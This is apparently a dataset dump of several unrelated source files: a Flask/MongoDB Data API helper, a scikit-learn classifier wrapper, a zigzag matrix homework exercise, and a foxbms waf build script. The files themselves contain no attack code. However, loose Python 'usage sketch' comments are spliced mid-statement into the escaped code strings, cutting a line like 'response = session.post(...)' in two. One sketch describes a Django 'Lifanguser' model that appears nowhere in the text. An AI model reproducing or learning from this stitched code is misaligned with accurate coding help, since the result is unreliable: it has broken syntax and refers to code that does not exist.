copy.deepcopy(settings.PAYLOAD)\n payload['document'] = recipe\n response = session.post(action, json=payload)\n return response\n\n\ndef insert_many(recipes: List[Dict[str, Any]]) -> 'requests.Response':\n \"\"\"Insert many recipes into the database.\n\n Args:\n recipes (List[Dict[str, Any]]): Recipes to insert.\n\n Returns:\n requests.Response: Response from the API.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/insertMany'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['documents'] = recipes\n response = session.post(action, json=payload)\n return response\n\n\ndef find_one(query: Dict[str, Any]) -> Any:\n \"\"\"Find one recipe.\n\n Args:\n query (Dict[str, Any]): filter for find_one API.\n\n Returns:\n Any: Recipe.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/findOne'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['filter'] = query\n response = session.post(action, json=payload)\n return response.json()\n\n\ndef find_all(query: Dict[str, Any]) -> Any:\n \"\"\"Find all recipes.\n\n Args:\n query (Dict[str, Any]): filter for find_all API.\n\n Returns:\n Any: Recipes.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/find'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['filter'] = query\n response = 
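# Usage sketch for the Lifanguser model above (all values hypothetical). Django
# convention is a list of (value, label) 2-tuples for choices; the set literal
# used above works at runtime but iterates in no stable order, which churns
# generated migrations:
from lifanguser.models import Lifanguser   # import path assumed from the app name

LEVEL_CHOICES = [('admin', 'admin'), ('user', 'user')]   # stable ordering

user = Lifanguser.objects.create(
    email='someone@example.com',
    password='hashed-password-here',       # hash before storing in real code
    level='user',
)
print(user)                                # __str__ returns the email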
session.post(action, json=payload)\n return response.json()\n\n\ndef delete_one(query: Dict[str, Any]) -> Any:\n \"\"\"Delete one recipe.\n\n Args:\n query (Dict[str, Any]): filter for delete_one API.\n\n Returns:\n Any: Response from the API.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/deleteOne'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['filter'] = query\n response = session.post(action, json=payload)\n return response.json()\n\n\ndef update_one(query: Dict[str, Any], update: Dict[str, Any]) -> Any:\n \"\"\"Update one recipe.\n\n Args:\n query (Dict[str, Any]): filter for update_one API.\n update (Dict[str, Any]): update for update_one API.\n\n Returns:\n Any: Response from the API.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/updateOne'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['filter'] = query\n payload['update'] = update\n response = session.post(action, json=payload)\n return response.json()\n","repo_name":"rambasnet/flask-docker-mongo-heroku","sub_path":"app/db_api.py","file_name":"db_api.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24839818629","text":"import string\nimport argparse\n# import data\nimport math\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import preprocessing\nimport numpy as np\nfrom warnings import simplefilter\n\nsimplefilter(action='ignore', category=FutureWarning)\n\n\nclass Learner:\n\n def __init__(self):\n self.X_train = []\n self.Y_train = []\n self.X_test = []\n self.X_train_counts = []\n self.clf = LogisticRegression()\n self.predicted_labels = []\n\n def train(self, X_vals, Y_vals):\n for sample in X_vals:\n self.X_train.append(sample)\n for tag in Y_vals:\n self.Y_train.append(tag)\n\n print(\"Training model...\\n\")\n\n # self. X_train_counts = scaler.fit_transform(X_train_counts)\n self.clf.fit(self.X_train, self.Y_train) # trains the model using gradient descent\n\n print(\"Model successfully trained. \\n\")\n\n def test(self, X_vals, Y_vals):\n for sample in X_vals:\n self.X_test.append(sample)\n\n print(\"Testing accuracy with labeled dataset. \\n\")\n\n self.predicted_labels = self.clf.predict(self.X_test)\n\n correct = 0\n count = 0\n for i, tag in enumerate(Y_vals):\n if tag == self.predicted_labels[i]:\n correct += 1\n count += 1\n percent = (correct / count) * 100\n print(\"Model rated with a\", percent, \"% accuracy rate. 
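# Usage sketch for db_api.py above, assuming settings.HEADERS carries the API
# key and settings.PAYLOAD names the data source/database/collection (both are
# defined elsewhere in the repo, not shown here). Document values are made up:
new_recipe = {"name": "pancakes", "servings": 4}
resp = insert_one(new_recipe)
print(resp.status_code, resp.json())                  # the Data API echoes an insertedId

print(find_one({"name": "pancakes"}))                 # filter is passed straight through
update_one({"name": "pancakes"}, {"$set": {"servings": 6}})
delete_one({"name": "pancakes"})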
\\n\")\n\n\n'''\nl = Learner()\nl.train([ [0,1,2,3], [0,1,3,4], [0,1,2,8] ], ['a', 'b', 'e'] )\nl.test([ [0,5,2,3], [4,1,3,4], [0,0,2,8] ], ['a', 'b', 'b'] )\n'''\n","repo_name":"JPsquared/Autonomous-Threat-Hunting","sub_path":"learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36326524878","text":"# Homework Problem 1 (Level: Medium)\n# Print a 2D array in Diagonal ZigZag order.\n# For example,Input:1 2 3 4 5 6 7 8 9 0 1 2\n# Output:1 2 5 9 6 3 4 7 0 1 8 2\n\n\ndef diagonal_zigzag_print(matrix):\n rows = len(matrix)\n cols = len(matrix[0])\n curr_col = curr_row = 0\n res = []\n going_up = True\n\n\n while len(res) != cols * rows:\n if going_up:\n while curr_col < cols and curr_row >= 0:\n res.append(matrix[curr_row][curr_col])\n curr_row -= 1\n curr_col += 1\n if curr_col >= cols:\n curr_row += 2\n curr_col -= 1 \n else:\n curr_row += 1\n going_up = False\n else:\n while curr_row < rows and curr_col >= 0:\n res.append(matrix[curr_row][curr_col])\n curr_row += 1\n curr_col -= 1\n if curr_row == rows:\n curr_row -= 1\n curr_col += 2\n else:\n curr_col += 1 \n going_up = True\n\n return res\n\n# -------- TEST CASE --------\nmatrix = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 0, 1, 2]\n]\n\n# output should be [1, 2, 5, 9, 6, 3, 4, 7, 0, 1, 8, 2]\nprint(diagonal_zigzag_print(matrix))\n# output should be [1,2,4,7,5,3,6,8,9]\nprint(diagonal_zigzag_print([[1,2,3],[4,5,6],[7,8,9]]) )\n# output should be [1,2,3,4]\nprint(diagonal_zigzag_print([[1,2],[3,4]]) )\n\n# -------- WORKING SOLUTION --------\n\n# def diagonal_zigzag_print(matrix):\n# rows = len(matrix)\n# cols = len(matrix[0])\n# res = []\n# # starting position at 0,0\n# curr_row = curr_col = 0\n# going_up = True\n\n# while len(res) != rows * cols :\n# if going_up:\n# while curr_row >= 0 and curr_col < cols:\n# res.append(matrix[curr_row][curr_col])\n\n# curr_row -= 1\n# curr_col += 1\n \n# if curr_col == cols:\n# curr_col -=1\n# curr_row += 2\n# else:\n# curr_row += 1\n# going_up = False\n# else:\n# while curr_row < rows and curr_col >= 0 :\n# res.append(matrix[curr_row][curr_col])\n\n# curr_col -= 1\n# curr_row += 1\n\n# if curr_row == rows:\n# curr_col += 2\n# curr_row -=1 \n# else:\n# curr_col += 1\n# going_up = True\n \n# return res\n","repo_name":"shin101/interview-camp","sub_path":"12. 
Arrays and Strings II/2D_Arrays_1.py","file_name":"2D_Arrays_1.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"35121092927","text":"import os\nimport sys\nimport datetime\nimport posixpath\nimport re\nimport yaml\nimport jinja2\n# try to use FullLoader (PyYAML 5.1+) and fall back to the normal Loader\ntry:\n from yaml import FullLoader as YAMLLoader\nexcept ImportError:\n from yaml import Loader as YAMLLoader\n\nimport waflib # bind the package name; options() below uses waflib.Context/waflib.Build\nfrom waflib import Utils, Options, Errors, Logs\nfrom waflib import Task, TaskGen\nfrom waflib.Tools.compiler_c import c_compiler\nfrom waflib.Tools.c import c\nfrom waflib.Tools import c_preproc\n\n\n# overwrite c task to use absolute paths for the input file\nclass c(Task.Task): # noqa: F811\n run_str = '${CC} ${ARCH_ST:ARCH} ${CFLAGS} ${FRAMEWORKPATH_ST:FRAMEWORKPATH} ${CPPPATH_ST:INCPATHS} ${DEFINES_ST:DEFINES} ${CC_SRC_F}${SRC[0].abspath()} ${CC_TGT_F}${TGT[0].abspath()} ${CPPFLAGS}'\n vars = ['CCDEPS']\n ext_in = ['.h']\n scan = c_preproc.scan\n\n\nout = 'build'\nvariants = ['primary', 'secondary', 'libs', 'primary_bare', 'secondary_bare']\nfrom waflib.Build import BuildContext, CleanContext, ListContext, StepContext # noqa: E402\nfor x in variants:\n for y in (BuildContext,\n CleanContext,\n ListContext,\n StepContext):\n name = y.__name__.replace('Context', '').lower()\n\n class tmp_1(y):\n if name == 'build':\n __doc__ = '''executes the {} of {}'''.format(name, x)\n elif name == 'clean':\n __doc__ = '''cleans the project {}'''.format(x)\n elif name == 'list':\n __doc__ = '''lists the targets to execute for {}'''.format(x)\n elif name == 'step':\n __doc__ = '''executes tasks in a step-by-step fashion, ''' \\\n '''for debugging of {}'''.format(x)\n cmd = name + '_' + x\n variant = x\n\n dox = 'doxygen'\n\n class tmp_2(BuildContext):\n __doc__ = '''creates the {} documentation of {}'''.format(dox, x)\n cmd = dox + '_' + x\n fun = dox\n variant = x\n\n\ndef options(opt):\n opt.load('compiler_c')\n opt.load('python')\n opt.load(['doxygen', 'sphinx_build', 'cpplint', 'flake8', 'cppcheck'],\n tooldir=os.path.join('tools', 'waftools'))\n opt.add_option('-t', '--target', action='store', default='debug',\n help='build target: debug (default)/release', dest='target')\n opt.add_option('-l', '--libs', action='store', default='',\n help='name of the library to be used')\n for k in ('--targets',\n '--out',\n '--top',\n '--prefix',\n '--destdir',\n '--bindir',\n '--libdir',\n '--msvc_version',\n '--msvc_targets',\n '--no-msvc-lazy',\n '--force',\n '--check-c-compiler'):\n option = opt.parser.get_option(k)\n if option:\n opt.parser.remove_option(k)\n\n mctx = waflib.Context.classes\n mctx.remove(waflib.Build.InstallContext)\n mctx.remove(waflib.Build.UninstallContext)\n\n\ndef configure(conf):\n if ' ' in conf.path.abspath():\n conf.fatal(f'path to foxbms must not contain spaces'\n f' (current path: {conf.path.abspath()}).')\n\n conf.load('python')\n conf.check_python_version((3, 6))\n\n # Setup the whole toolchain (compiler, interpreter etc.)\n print('Compiler toolchain:')\n pref = 'arm-none-eabi-' # prefix for all gcc related tools\n exe_extension = ''\n if sys.platform.startswith('win'):\n conf.env.jinja2_newline = '\\r\\n'\n exe_extension = '.exe'\n else:\n conf.env.jinja2_newline = '\\n'\n conf.env.CC = pref + 'gcc' + exe_extension\n conf.env.AR = pref + 'ar' + exe_extension\n conf.env.LINK_CC = pref + 'g++' + exe_extension\n gcc_tools = 'cpp ranlib as strip objcopy objdump size 
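# An equivalent way to state the traversal in 2D_Arrays_1.py above: cells on
# one anti-diagonal share i + j, so grouping by that key and reversing every
# other group reproduces the zigzag order without pointer bookkeeping. Sketch:
def diagonal_zigzag_groups(matrix):
    groups = {}
    for i, row in enumerate(matrix):
        for j, val in enumerate(row):
            groups.setdefault(i + j, []).append(val)   # filled top row first
    out = []
    for d in range(len(matrix) + len(matrix[0]) - 1):
        vals = groups[d]
        out.extend(vals if d % 2 else vals[::-1])      # alternate direction per diagonal
    return out

print(diagonal_zigzag_groups([[1, 2, 3, 4], [5, 6, 7, 8], [9, 0, 1, 2]]))
# -> [1, 2, 5, 9, 6, 3, 4, 7, 0, 1, 8, 2], matching the test case above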
gdb'.split()\n for k in reversed(sorted(gcc_tools, key=len)):\n conf.find_program(pref + k, var=k.upper(), mandatory=True)\n for key in c_compiler: # force only using gcc\n c_compiler[key] = ['gcc']\n conf.load('compiler_c')\n conf.load(['doxygen', 'sphinx_build', 'cpplint', 'flake8', 'cppcheck'])\n print('General tools:')\n conf.find_program('python', var='PYTHON', mandatory=True)\n conf.find_program('git', var='GIT', mandatory=False)\n\n # define configuration files etc.\n # parsing the version info based on the general documentation\n conf.env.sphinx_doc_dir = os.path.join('documentation', 'sphinx')\n to_posix = (conf.env.sphinx_doc_dir).split(os.sep)\n conf.env.sphinx_doc_dir_posix = posixpath.join(*(to_posix))\n conf.env.sphinx_conf_path = os.path.join(conf.env.sphinx_doc_dir,\n 'conf.py')\n version_info_file = os.path.join(conf.env.sphinx_doc_dir, 'macros.rst')\n with open(version_info_file, 'r', encoding='UTF-8') as f:\n txt = f.read()\n rgx = r'\\.\\.[ ]\\|version\\|[ ]replace::[ ]``(\\d{1,}\\.\\d{1,}\\.\\d{1,})``'\n tmp_version = re.search(rgx, txt)\n try:\n conf.env.version = tmp_version.group(1)\n except AttributeError:\n err_msg = 'Could not find a version info in {}.\\\n'.format(version_info_file)\n conf.fatal(err_msg)\n\n conf.env.appname = 'foxbms'\n conf.env.appname_prefix = conf.env.appname\n conf.env.vendor = 'Fraunhofer IISB'\n conf.env.version_primary = conf.env.version\n conf.env.version_secondary = conf.env.version\n\n # Setup the compiler and link flags\n with open('compiler-flags.yml', 'r') as stream:\n try:\n compiler_flags = yaml.load(stream, Loader=YAMLLoader)\n except yaml.YAMLError as exc:\n conf.fatal(exc)\n cflags = compiler_flags['CFLAGS']\n conf.env.append_value('CFLAGS', [x for x in cflags if type(x) == str])\n for x in cflags:\n if type(x) is dict:\n add_flag = 'CFLAGS_' + list(x.keys())[0]\n conf.env.append_value(add_flag, list())\n if list(x.values())[0] is None:\n continue\n conf.env.append_value(add_flag, *(x.values()))\n conf.env.ASMFLAGS = compiler_flags['ASMFLAGS']\n conf.env.LINKFLAGS = compiler_flags['LINKFLAGS']\n conf.env.XLINKER = compiler_flags['XLINKER']\n\n # get HAL version and floating point version based on compiler define and\n # check if cpu and floating point version are fitting together\n cpu = None\n floating_point_version = None\n for _cflag in conf.env.CFLAGS:\n if 'mcpu' in _cflag:\n cdef, cpu = _cflag.split('=')\n if 'mfpu' in _cflag:\n cdef, floating_point_version = _cflag.split('=')\n if not cpu:\n conf.fatal('cflag \\'mcpu\\' missing.')\n if not floating_point_version:\n conf.fatal('cflag \\'mfpu\\' missing.')\n if cpu == 'cortex-m4':\n conf.env.CPU_MAJOR = 'STM32F4xx'\n if floating_point_version != 'fpv4-sp-d16':\n conf.fatal('floating point unit flag not compatible with cpu')\n else:\n conf.fatal(f'cpu \\'{cpu}\\' is not supported')\n\n utcnow = datetime.datetime.utcnow()\n utcnow = ''.join(utcnow.isoformat('-').split('.')\n [0].replace(':', '-').split('-'))\n conf.env.timestamp = utcnow\n\n conf.define('BUILD_APPNAME_PREFIX', conf.env.appname_prefix)\n for x in variants:\n conf.define(\n ('BUILD_APPNAME_{}'.format(x)).upper(),\n '{}_{}'.format(conf.env.appname_prefix, x)[:14],\n comment='Define is trimmed to max. 
14 characters'.format(x))\n conf.define('BUILD_VERSION_PRIMARY', conf.env.version_primary)\n conf.define('BUILD_VERSION_SECONDARY', conf.env.version_secondary)\n\n conf.env.target = conf.options.target\n\n env_debug = conf.env.derive()\n env_debug.detach()\n env_release = conf.env.derive()\n env_release.detach()\n\n # configuration for debug\n conf.setenv('debug', env_debug)\n conf.define('RELEASE', 1)\n conf.undefine('DEBUG')\n conf.env.CFLAGS += ['-g', '-O0']\n\n # configuration for release\n conf.setenv('release', env_release)\n conf.env.CFLAGS += ['-O2']\n\n if conf.options.target == 'release':\n conf.setenv('', env_release)\n else:\n conf.setenv('', env_debug)\n\n env_release.store(os.path.join(out, 'env-store.log'))\n\n config_dir = 'config'\n conf.path.get_bld().make_node(config_dir).mkdir()\n conf.confdir = conf.path.get_bld().find_node(config_dir)\n\n _cmd = [Utils.subst_vars('${CC}', conf.env), '-dM', '-E', '-']\n std_out, std_err = conf.cmd_and_log(_cmd, output=0, input='\\n'.encode())\n std_out = '/* WARNING: DO NOT EDIT */\\n' \\\n '/* INTERNAL GCC MARCOS */\\n' \\\n '/* FOR INFORMATION ONLY */\\n' \\\n '\\n' \\\n '{}'.format(std_out)\n conf.confdir.make_node('gcc_builtin_macros.h').write(std_out)\n\n header_file_name = conf.env.appname_prefix + 'config.h'\n header_file_path = os.path.join(config_dir, header_file_name),\n def_guard = header_file_name.upper().replace('.H', '_H_')\n conf.write_config_header(header_file_path, guard=def_guard)\n print('---')\n print('Vendor: {}'.format(conf.env.vendor))\n print('Appname prefix: {}'.format(conf.env.appname_prefix))\n print('Applications: {}'.format(', '.join(variants)))\n print('Version primary: {}'.format(conf.env.version_primary))\n print('Version secondary: {}'.format(conf.env.version_secondary))\n print('---')\n print('Config header: {}'.format(conf.env.cfg_files))\n print('Build configuration: {}'.format(conf.env.target))\n print('---')\n conf.path.get_bld().make_node('cflags.log').write('\\n'.join(conf.env.CFLAGS) + '\\n')\n conf.path.get_bld().make_node('cflags-foxbms.log').write('\\n'.join(conf.env.CFLAGS_foxbms) + '\\n')\n conf.path.get_bld().make_node('cflags-freertos.log').write('\\n'.join(conf.env.CFLAGS_freertos) + '\\n')\n conf.path.get_bld().make_node('hal.log').write('\\n'.join(conf.env.CFLAGS_hal) + '\\n')\n conf.path.get_bld().make_node('asmflags.log').write('\\n'.join(conf.env.ASMFLAGS) + '\\n')\n conf.path.get_bld().make_node('linkflags.log').write('\\n'.join(conf.env.LINKFLAGS) + '\\n')\n conf.path.get_bld().make_node('xlinker.log').write('\\n'.join(conf.env.XLINKER) + '\\n')\n\n lib_dir = conf.path.get_bld().make_node('lib')\n lib_dir.mkdir()\n conf.env.append_value('LIBPATH', lib_dir.abspath())\n conf.env.LIB_DIR_LIBS = lib_dir.abspath()\n print(f'Additional Library directory: {lib_dir.abspath()}')\n\n inc_dir = conf.path.get_bld().make_node('include')\n inc_dir.mkdir()\n conf.env.append_value('INCLUDES', inc_dir.abspath())\n conf.env.INCLUDE_DIR_LIBS = inc_dir.abspath()\n print(f'Additional Include directory: {inc_dir.abspath()}')\n\n if conf.options.libs:\n conf.env.USER_DEFINED_LIBS = conf.options.libs\n print(f'Using library: {conf.options.libs}')\n else:\n conf.env.USER_DEFINED_LIBS = None\n\n # calculate expected binary size from flasheader credentials\n conf.env.flash_begin_adr = 0x080FFF48 & 0x00ffffff\n conf.env.flash_header_adr = 0x080FFF00 & 0x00ffffff\n conf.env.flash_end_adr = 0x080FFF4C & 0x00ffffff\n\n # cppcheck configuration\n if conf.env.CPPCHECK:\n cppcheck_dir = 
conf.path.get_bld().make_node('cppcheck')\n cppcheck_dir.mkdir()\n templateLoader = jinja2.FileSystemLoader(searchpath=os.path.join('tools', 'cppcheck'))\n templateEnv = jinja2.Environment(loader=templateLoader, newline_sequence=conf.env.jinja2_newline)\n template = templateEnv.get_template('cppcheck.template')\n outputText = template.render(\n bld_dir='.',\n src_dir='../../embedded-software',\n inc_dirs=['../../embedded-software/libs',\n '../../embedded-software/mcu-common',\n '../../embedded-software/mcu-primary',\n '../../embedded-software/mcu-secondary',\n '../../build/primary/embedded-software/mcu-primary/src/general',\n '../../build/secondary/embedded-software/mcu-secondary/src/general'],\n addons=['threadsafety', 'y2038', 'cert', 'misra'])\n\n cppcheck_cfg = cppcheck_dir.make_node('cppcheck.cppcheck')\n cppcheck_cfg.write(outputText)\n conf.env.cppcheck_dir = cppcheck_dir.abspath()\n conf.env.cppcheck_cfg = cppcheck_cfg.abspath()\n print(f'---\\ncppcheck configuration: {conf.env.cppcheck_cfg}')\n\n print('---\\ngit information:')\n try:\n (std_out, std_err) = conf.cmd_and_log([conf.env.GIT[0], 'config', '--get', 'remote.origin.url'], output=waflib.Context.BOTH)\n except Errors.WafError as e:\n Logs.warn('--> directory is not a git repository')\n t = ('NOREMOTE', [True])\n else:\n t = (std_out.strip(), [False])\n\n conf.env.append_value('GIT_REPO_PATH', t[0])\n conf.env.append_value('GIT_DIRTY_ALWAYS', t[1])\n print(f'repository path: {conf.env.GIT_REPO_PATH[0]}')\n if conf.env.GIT_DIRTY_ALWAYS[0]:\n print(f'no remote: {conf.env.GIT_DIRTY_ALWAYS[0]}')\n conf.env.FILE_TEMPLATE_C = conf.path.find_node('tools/styleguide/file-templates/template.c.jinja2').read()\n conf.env.FILE_TEMPLATE_H = conf.path.find_node('tools/styleguide/file-templates/template.h.jinja2').read()\n\n\ndef build(bld):\n\n import sys\n import logging\n from waflib import Logs\n if not bld.variant:\n bld.fatal(f'A {bld.cmd} variant must be specified, run \\'{sys.executable} {sys.argv[0]} --help\\'')\n\n log_file = os.path.join(out, 'build_' + bld.variant + '.log')\n bld.logger = Logs.make_logger(log_file, out)\n hdlr = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter('%(message)s')\n hdlr.setFormatter(formatter)\n bld.logger.addHandler(hdlr)\n\n if bld.variant in ('primary', 'secondary'):\n bld.add_pre_fun(repostate)\n\n bld.env.es_dir = os.path.normpath('embedded-software')\n if bld.variant == 'libs':\n src_dir = os.path.normpath('{}'.format(bld.variant))\n if bld.cmd.startswith('clean'):\n for x in bld.path.ant_glob(f'{out}/lib/**/*.a {out}/include/**/*.h'):\n x.delete()\n else:\n # for bare build we *basically* have the same build, therefore the\n # source folder stays the same, but *_bare builds do not include\n # FreeRTOS\n if bld.variant.endswith('_bare'):\n src_dir = os.path.normpath(\n 'mcu-{}'.format(bld.variant.replace('_bare', '')))\n bld.env.FreeRTOS_dirs = '' # no FreeRTOS in bare build\n else:\n src_dir = os.path.normpath('mcu-{}'.format(bld.variant))\n bld.env.FreeRTOS_dirs = ' '.join([\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-freertos', 'Source'),\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-freertos', 'Source', 'include'),\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-freertos', 'Source', 'portable', 'GCC', 'ARM_CM4F')])\n\n bld.env.mcu_dir = src_dir\n\n bld.env.common_dir = os.path.normpath('mcu-common')\n bld.env.hal_dirs = ' '.join([\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-hal', 'CMSIS', 'Device', 'ST', bld.env.CPU_MAJOR, 'Include'),\n 
os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-hal', 'CMSIS', 'Include'),\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-hal', bld.env.CPU_MAJOR + '_HAL_Driver', 'Inc')])\n t = os.path.dirname(bld.env.cfg_files[0])\n bld.env.append_value('INCLUDES', t)\n bld.recurse(os.path.join(bld.env.es_dir, src_dir))\n\n\ndef repostate(bld):\n Logs.info('Adding git information...')\n file_name = 'gitinfo_cfg'\n gitinfo_dir = os.path.join(bld.env.es_dir, bld.env.mcu_dir, 'src', 'general')\n bld.path.get_bld().make_node(gitinfo_dir).mkdir()\n bld.env.git_infoc = bld.path.get_bld().make_node(os.path.join(gitinfo_dir, f'{file_name}.c'))\n bld.env.git_infoh = bld.path.get_bld().make_node(os.path.join(gitinfo_dir, f'{file_name}.h'))\n templatec = jinja2.Environment(loader=jinja2.BaseLoader, keep_trailing_newline=True, newline_sequence=bld.env.jinja2_newline).from_string(bld.env.FILE_TEMPLATE_C)\n templateh = jinja2.Environment(loader=jinja2.BaseLoader, keep_trailing_newline=True, newline_sequence=bld.env.jinja2_newline).from_string(bld.env.FILE_TEMPLATE_H)\n _date = datetime.datetime.today().strftime('%d.%m.%Y')\n\n if bld.env.GIT_REPO_PATH[0] == \"NOREMOTE\":\n bld.env.GIT_COMMIT_ID = 'NOVALIDCOMMIT'\n bld.env.CLEAN, bld.env.DIRTY = (0, 1)\n bld.env.GIT_STATUS = 'GIT_DIRTY_STARTUP'\n else:\n try:\n (std_out, std_err) = bld.cmd_and_log([bld.env.GIT[0], 'rev-parse', 'HEAD'], output=waflib.Context.BOTH)\n except Errors.WafError as e:\n Logs.error(e)\n bld.env.GIT_COMMIT_ID = 'NOVALIDCOMMIT'\n else:\n bld.env.GIT_COMMIT_ID = std_out.strip()\n\n try:\n (std_out, std_err) = bld.cmd_and_log([bld.env.GIT[0], 'status'], output=waflib.Context.BOTH)\n except Errors.WafError as e:\n std_out = None\n Logs.error(e)\n else:\n if \"nothing to commit, working tree clean\" in std_out:\n bld.env.CLEAN, bld.env.DIRTY = (1, 0)\n bld.env.GIT_STATUS = 'GIT_CLEAN_STARTUP'\n else:\n bld.env.CLEAN, bld.env.DIRTY = (0, 1)\n bld.env.GIT_STATUS = 'GIT_DIRTY_STARTUP'\n print(f'clean: {bld.env.CLEAN} \\ndirty: {bld.env.DIRTY}')\n\n # header file\n brief = 'Contains information about the repository state'\n macros = []\n defs = ['''\\\ntypedef enum {\n GIT_CLEAN_STARTUP = 0,\n GIT_DIRTY_STARTUP = 1,\n} GIT_STARTUP_BIT_e;''',\n f'''\\\ntypedef struct {{\n STD_RETURN_TYPE_e clean_repo_build;\n STD_RETURN_TYPE_e allow_startup;\n}} GIT_STATUS_s;''',\n f'''\\\ntypedef struct {{\n char repo_url[{len(bld.env.GIT_REPO_PATH[0])+1}];\n char commit_id[{len(bld.env.GIT_COMMIT_ID)+1}];\n uint8_t always_dirty; /* if there is no remote, this is always set */\n GIT_STARTUP_BIT_e git_startup_bit; /* set dependent on git status */\n}} GIT_ValidStruct_s;''']\n\n externvars = [\n 'extern GIT_STATUS_s git_status;',\n 'extern const GIT_ValidStruct_s git_validation;']\n externfunsproto = ['extern STD_RETURN_TYPE_e GIT_checkStartup(void);']\n txt_git_info_h = templateh.render(\n filename=os.path.splitext(file_name)[0],\n add_author_info='(autogenerated)',\n filecreation=_date,\n ingroup='GIT_INFO',\n prefix='GIT',\n brief=brief,\n details='',\n includes=['general.h'],\n macros=macros,\n defs=defs,\n externvars=externvars,\n externfunsproto=externfunsproto)\n Logs.info(f'Created {bld.env.git_infoh.relpath()}')\n bld.env.git_infoh.write(txt_git_info_h)\n\n # implementation file\n startupfun = ['''\\\nSTD_RETURN_TYPE_e GIT_checkStartup() {\n STD_RETURN_TYPE_e retval = E_NOT_OK;\n if (git_validation.git_startup_bit == GIT_CLEAN_STARTUP &&\n git_validation.always_dirty == 0) {\n retval = E_OK;\n }\n return retval;\n}''']\n externvars = [\n '''GIT_STATUS_s 
git_status = {0xFF, 0xFF};''',\n        f'''\\\nextern const GIT_ValidStruct_s git_validation = {{\n    \"{bld.env.GIT_REPO_PATH[0]}\", /* remote repository path */\n    \"{bld.env.GIT_COMMIT_ID}\", /* last commit hash that could be retrieved */\n    {int(bld.env.GIT_DIRTY_ALWAYS[0])}, /* set if the repository has no remote */\n    {bld.env.GIT_STATUS}, /* is the repository dirty? */\n}};\n''']\n    txt_git_info_c = templatec.render(\n        filename=os.path.splitext(file_name)[0],\n        add_author_info='(autogenerated)',\n        inc_files=[],\n        filecreation=_date,\n        ingroup='GIT_INFO',\n        prefix='GIT',\n        brief='Contains information about the repository state',\n        externvars=externvars,\n        externfunsimpl=startupfun,\n        details='')\n    bld.env.git_infoc.write(txt_git_info_c)\n    Logs.info(f'Created {bld.env.git_infoc.relpath()}')\n    Logs.info('done...')\n\n\ndef doxygen(bld):\n    import sys\n    import logging\n    from waflib import Logs\n\n    if not bld.variant:\n        bld.fatal(f'A {bld.cmd} variant must be specified, run \\'{sys.executable} {sys.argv[0]} --help\\'')\n\n    if not bld.env.DOXYGEN:\n        bld.fatal(f'Doxygen was not configured. Run \\'{sys.executable} {sys.argv[0]} --help\\'')\n\n    _docbuilddir = os.path.normpath(bld.bldnode.abspath())\n    doxygen_conf_dir = os.path.join('documentation', 'doxygen')\n    os.makedirs(_docbuilddir, exist_ok=True)\n    conf_file = 'doxygen-{}.conf'.format(bld.variant)\n    doxygenconf = os.path.join(doxygen_conf_dir, conf_file)\n\n    log_file = os.path.join(\n        bld.bldnode.abspath(), 'doxygen_' + bld.variant + '.log')\n    bld.logger = Logs.make_logger(log_file, out)\n    hdlr = logging.StreamHandler(sys.stdout)\n    formatter = logging.Formatter('%(message)s')\n    hdlr.setFormatter(formatter)\n    bld.logger.addHandler(hdlr)\n\n    bld(features='doxygen', doxyfile=doxygenconf)\n\n\ndef flake8(bld):\n    bld(features='flake8')\n\n\ndef cppcheck(bld):\n\n    class tsk_cppcheck(Task.Task):\n\n        def scan(self):\n            nodes = bld.path.ant_glob('**/*.c **/*.h')\n            return (nodes, [])\n\n        def run(self):\n            prg = Utils.subst_vars('${CPPCHECK}', bld.env)\n            cfg = Utils.subst_vars('${cppcheck_cfg}', bld.env)\n            cmd = [prg, f'--project={cfg}']\n            if bld.env.CPPCHECK_ERROR_EXITCODE:\n                opt = [f'--error-exitcode={bld.env.CPPCHECK_ERROR_EXITCODE}']\n                cmd.extend(opt)\n            std_out, std_err = self.generator.bld.cmd_and_log(cmd, output=waflib.Context.BOTH)\n            if std_err:\n                Logs.error(std_err)\n            if not std_err or bld.env.CPPCHECK_ERROR_EXITCODE == 0:\n                self.outputs[0].write(std_out)\n\n    @TaskGen.feature('run_cppcheck')\n    def add_cppcheck(self):\n        self.create_task('tsk_cppcheck', tgt=self.path.find_or_declare('cppcheck').make_node('cppcheck.out'))\n\n    bld(features='run_cppcheck')\n\n\ndef cpplint(bld):\n    from waflib import Logs\n\n    class tsk_cpplint(Task.Task):\n\n        def keyword(self):\n            return 'Linting'\n\n        def scan(self):\n            node = self.inputs[0]\n            return ([node], [])\n\n        def run(self):\n            cmd = [Utils.subst_vars('${CPPLINT}', bld.env)] + self.generator.env.cpplint_options + [self.inputs[0].abspath()]\n            Logs.debug(' '.join(cmd))\n            proc = Utils.subprocess.Popen(cmd, stdout=Utils.subprocess.PIPE, stderr=Utils.subprocess.PIPE, shell=True)\n            std_out, std_err = proc.communicate()\n            std_out, std_err = std_out.decode(), std_err.decode()\n            if proc.returncode:\n                Logs.error(std_err)\n                self.outputs[0].change_ext('.error').write(std_err)\n            else:\n                